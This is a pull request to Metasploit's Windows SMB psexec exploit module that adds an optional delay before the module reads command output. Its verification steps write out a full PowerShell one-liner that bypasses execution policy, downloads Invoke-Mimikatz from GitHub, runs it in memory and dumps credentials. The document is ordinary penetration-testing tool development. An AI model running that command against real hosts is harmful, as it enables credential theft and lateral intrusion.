### PR TITLE
Add an optional delay when executing PSExec commands

### DIFF
--- a/modules/exploits/windows/smb/psexec.rb
+++ b/modules/exploits/windows/smb/psexec.rb
@@ -79,10 +79,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_advanced_options(
       [
-        OptBool.new('ALLOW_GUEST', [true, "Keep trying if only given guest access", false]),
-        OptString.new('SERVICE_FILENAME', [false, "Filename to to be used on target for the service binary",nil]),
+        OptBool.new('ALLOW_GUEST', [true, 'Keep trying if only given guest access', false]),
+        OptString.new('SERVICE_FILENAME', [false, 'Filename to to be used on target for the service binary', nil]),
         OptString.new('PSH_PATH', [false, 'Path to powershell.exe', 'Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe']),
-        OptString.new('SERVICE_STUB_ENCODER', [false, "Encoder to use around the service registering stub",nil])
+        OptString.new('SERVICE_STUB_ENCODER', [false, 'Encoder to use around the service registering stub', nil]),
+        OptInt.new('CMD::DELAY', [false, 'A delay (in seconds) before reading the command output and cleaning up', 3])
       ])
   end
 
@@ -91,7 +92,7 @@ class MetasploitModule < Msf::Exploit::Remote
     bat  = "\\Windows\\Temp\\#{Rex::Text.rand_text_alpha(8..16)}.bat"
     command = payload.encoded
 
-    output = execute_command_with_output(text, bat, command, smbshare, datastore['RHOST'])
+    output = execute_command_with_output(text, bat, command, smbshare, datastore['RHOST'], delay: datastore['CMD::DELAY'])
 
     unless output.nil?
       print_good('Command completed successfully!')


### PR DESCRIPTION
While creating the demo for MSF v6 I came a cross an issue with my use case which involved using the `psexec` exploit module with the "Command" target to download and run the Mimikatz Powershell script from the Empire project. Basically the command takes a few seconds to run, so the user needs the ability to set a delay in seconds to wait before reading the output, lest the module fail. This was already supported in the mixin, so this PR just exposes it through a datastore option.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/windows/smb/psexec`
- [ ] Set the target to Command
- [ ] Set the payload to `cmd/windows/generic` so an arbitrary command can be specified
- [ ] Set CMD to a command that takes a few seconds to run, set `CMD::DELAY` accordingly
    * I used `powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"` as the command, be careful to escape it properly
- [ ] Run the module and see the results

